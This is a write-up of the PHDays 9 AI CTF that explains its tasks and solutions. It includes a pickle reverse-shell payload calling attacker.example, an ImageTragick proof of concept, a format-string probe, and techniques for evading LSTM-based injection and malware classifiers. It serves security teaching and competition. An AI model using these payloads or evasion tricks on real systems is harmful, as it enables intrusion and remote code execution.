AI CTF: writeup and solutions

6/21/2019

At PHDays 9 we decided to take a look at the grittier side of artificial intelligence and machine learning. Our task-based capture the flag contest, AI CTF, put participants through their paces to test knowledge of AI-related security topics.

Classic CTFs somewhat resemble a game of Jeopardy: tasks are organized by category, with each task worth a bit more than the one before it. The topics are the standard security fare: web vulnerabilities, reverse engineering, cryptography, steganography, and binary exploitation. The winner is the team (which can be as small as one person) that collects the most points.

AI CTF launched on the first day of PHDays and lasted just over 24 hours. The battle was every hacker for himself or herself. Although the contest was held online, some of the participants were on-site at PHDays, so everyone could get to know each other. The tasks did not require great computing resources and, in theory, could be finished in just a few hours. But make no mistake, some of the tasks were challenging—we didn't want to make it too easy :)

The contest consisted of six tasks (the seventh was just for the lulz). In this article, we will go over the solutions and note where many contenders got stuck.

But first, a massive thank you to @groke and @mostobriv, whose awesome ideas and technical insights made this CTF possible. What could have been nicer than a contest-eve deploy party in such splendid company?

Aww

Participants were given a dataset of 3,391 cat and dog photos: tiny.cc/6fj06y.

Since this task was in the steganography category, information of some sort had been hidden. Take a look at the images: it's an easy intuitive leap to guess that the cats and dogs themselves are acting as binary data. In other words, the sequence of cats and dogs just might form a message. Say that cats are 1 and dogs are 0 (or vice versa; just swap the two). Participants then needed a trained model to classify all these feline and canine faces. Worst case, you could train one yourself; GitHub has plenty of cat/dog classification lessons as well as pre-trained models. Then, after reducing each image to a 0 or a 1, they needed to group the resulting bit sequence into bytes and decode it as a string, as in the sketch below.
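For illustration, here is a minimal sketch of that pipeline. This is not the author's code; it assumes a hypothetical pre-trained Keras cat/dog classifier saved as model.h5 and that sorting the filenames restores the intended order:

    import glob
    import numpy as np
    from tensorflow.keras.models import load_model
    from tensorflow.keras.preprocessing import image

    model = load_model("model.h5")  # hypothetical pre-trained cat/dog classifier

    bits = []
    for path in sorted(glob.glob("dataset/*.jpg")):
        img = image.load_img(path, target_size=(128, 128))
        x = np.expand_dims(image.img_to_array(img) / 255.0, axis=0)
        # Assumes a sigmoid output: cat = 1, dog = 0 (swap if the text comes out garbled)
        bits.append("1" if model.predict(x)[0][0] > 0.5 else "0")

    bitstring = "".join(bits)
    # Group the bits into bytes and decode them as text
    message = bytes(int(bitstring[i:i + 8], 2) for i in range(0, len(bitstring) - 7, 8))
    print(message.decode(errors="replace"))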

The task author has a solution published on GitHub.

The resulting text contains the task flag:

AICTF{533m5_y0u_und3r574nd_4n1m4l5}

Multiple participants tried to tell us they had found a flag with the word "adopted," which we had a hard time understanding. It turned out that one of the pictures in the dataset had that word written on it prominently. And despite the point of steganography being to hide things, they assumed that this was the answer.

Notes

A web vulnerability task. The target in question was a blog where any user could make public and private notes. Given the limited feature set, it was easy to surmise that the task was to obtain a private note.

There was effectively just one input field (the entry ID). So what was a contestant to do?

The first thing to come to mind might be SQL injection. But since the blog is protected with AI (as noted in the task description), garden-variety SQL injection wouldn't work. Such attempts triggered the message "Hacking attempt!"—which many tried to send in as the task flag. Getting the actual solution required a bit more cleverness.

Under the hood was an LSTM network that analyzed the ID parameter for SQL injection. But an LSTM needs fixed-length input, which for simplicity's sake we limited to 20 characters: a query longer than 20 characters was truncated, and only what remained was checked; a shorter one was zero-padded. So ordinary SQL injection would not work right away, but there was room to craft a vector that the neural network would score as a "good" query and let through.
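As a hedged sketch of what such preprocessing might look like (our assumption based on the description above, not the contest's exact code):

    MAX_LEN = 20

    def preprocess(query: str) -> list:
        # The classifier only ever sees the first 20 characters
        codes = [ord(c) for c in query[:MAX_LEN]]  # truncate long queries
        codes += [0] * (MAX_LEN - len(codes))      # zero-pad short ones
        return codes

With a check like this, anything past the 20th character is invisible to the model, so a payload with a harmless-looking 20-character prefix could carry its injection entirely in the unchecked tail.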

New Edge QR reader

The task required recognizing a QR code.

Encrypted task files are available for download on Google Drive. Reversing the .pyc file and looking at the function code would show that all the necessary files were encrypted with AES, using a key derived from the bytecode of that function and of another one nested inside it.

There were two solution paths. The first: parse the .pyc file and recover the implementation of the key-deriving function. The other was to substitute your own proxy hashlib module that simply printed out whatever argument it received; running the program would then leak the decryption key. All that remained was to run the QR reader and recognize the included picture as the flag.
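A hedged sketch of that proxy-module trick (our illustration; which hash function the task actually fed the bytecode into isn't shown here, so md5 stands in as an example). Drop a file named hashlib.py next to the task script so the import resolves to it instead of the standard library:

    import importlib.util
    import os
    import sysconfig

    # Load the real standard-library hashlib explicitly by path, since this
    # file shadows it under the normal import mechanism
    _stdlib = sysconfig.get_paths()["stdlib"]
    _spec = importlib.util.spec_from_file_location(
        "_real_hashlib", os.path.join(_stdlib, "hashlib.py"))
    _real = importlib.util.module_from_spec(_spec)
    _spec.loader.exec_module(_real)

    def md5(data=b""):
        print("intercepted argument:", data)  # leaks the key material
        return _real.md5(data)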

Here is the detailed solution proposed by one of the top participants.

Prediction challenge

This was something like a Kaggle contest: sign up, download data and models, test these with private data, and get your result put up on the scoreboard. The objective was obvious: to obtain a perfect 1.0 score.

In our case, doing so was very difficult—and actually impossible!

The data had been generated randomly and, of course, taking the time to train the model was not what we had in mind. There had to be another way to get the necessary prediction ability. The site allowed uploading models in pickle format. Pickle, as everyone knows, can even be used for RCE—and what could be worse than that?

Not everyone knew, as it turned out. But this fact is what our brave participants needed to take advantage of. With remote access to the server, they could download the data used to test the solution, retrain the model, get that otherwise unattainable 1.0 score, and grab the flag.
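The classic trick looks something like this (a well-known pickle gadget, not necessarily the exact payload participants used; the reverse-shell command is a placeholder):

    import os
    import pickle

    class MaliciousModel:
        # Unpickling calls the result of __reduce__: os.system("<command>")
        def __reduce__(self):
            return (os.system,
                    ("bash -c 'bash -i >& /dev/tcp/attacker.example/4444 0>&1'",))

    with open("model.pkl", "wb") as f:
        pickle.dump(MaliciousModel(), f)  # upload this as your "model"

Whatever server unpickles the uploaded file runs the command, which is how participants could get the remote access described above.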

Our third-place winner published a solution on GitHub.

PhotoGram

Unsurprisingly, the mock service did something with images: participants were invited to upload a photo and, in response, received a stylized image with the AI CTF logo.

So where's the flag? What would a CTF be without plain old vulnerabilities, we say. This time, the vulnerability in question was ImageTragick, the well-known family of ImageMagick flaws. Only a few of the contestants made that connection, and not all who did were able to exploit it.
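For reference, the widely published ImageTragick (CVE-2016-3714) proof of concept is a crafted MVG file that ImageMagick happily treats as an image, while the fill URL smuggles a shell command into the delegate call. A sketch of how one might probe the service (the MVG contents are the public PoC; the upload details are our assumptions):

    lines = [
        b"push graphic-context",
        b"viewbox 0 0 640 480",
        b"fill 'url(https://example.com/x.jpg\"|ls \"-la)'",  # harmless test command
        b"pop graphic-context",
    ]

    with open("exploit.jpg", "wb") as f:  # renaming the extension may be needed
        f.write(b"\n".join(lines) + b"\n")

If the backend runs a vulnerable ImageMagick, the command after the pipe executes when the "image" is processed.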

New Age antivirus

This task was not solved by anyone, although based on our conversations with some of the competitors, they were very close to the answer.

The task files are available for download on Google Drive.

The system took Python bytecode and ran it on the server side. Of course, things aren't quite that simple, since there is AI security involved: the AI verified the Python version, and only code that passed the check was run on the server. And running code there could yield a lot of information.

It was enough to dilute the bytecode produced by the interpreter with NOP instructions, and the neural network (also an LSTM) would let it through.
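As a toy illustration of that padding idea (our sketch, assuming CPython 3.8+, where instructions are two bytes and code objects expose .replace(); a real payload interleaving NOPs would also need jump targets fixed up):

    import dis

    def pad_with_nops(code_obj, n=50):
        # Append unreachable NOPs after the final RETURN_VALUE: nothing to
        # relocate, but the byte sequence the classifier sees changes
        nop = bytes([dis.opmap["NOP"], 0]) * n
        return code_obj.replace(co_code=code_obj.co_code + nop)

    padded = pad_with_nops(compile("print(open('/etc/passwd').read())", "<x>", "exec"))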

Then, once you could run Python code, you would discover the flag_reader binary (run as root) on the server. It contained a format string vulnerability that enabled reading the flag.
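A hedged way to probe such a bug (assuming flag_reader passes its argument straight to printf() and the flag sits somewhere reachable on the stack; the exact interface is our guess):

    import subprocess

    # Try "%N$s" for increasing N and watch for flag-like output
    for i in range(1, 40):
        out = subprocess.run(["./flag_reader", f"%{i}$s"],
                             capture_output=True, text=True).stdout
        if "AICTF{" in out:
            print(i, out)
            break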

The approach of one participant can be read on GitHub.

Results

A total of 130 contestants signed up for the contest, of whom 14 found at least one flag. Five of the six tasks were solved.

Top scorers:

  • 1st place – silent (500 points)
  • 2nd place – kurmur (500 points)
  • 3rd place – konodyuk (400 points)

At the end of Day 2 of PHDays, the winners received congratulations and neat prizes: AWS DeepLens, Coral Dev Board, and a PHDays backpack.

The usual CTF crowd, which in recent years has been getting into machine learning and AI, appreciated the contest. We hope that next time the contestants will include security-curious data analysts too!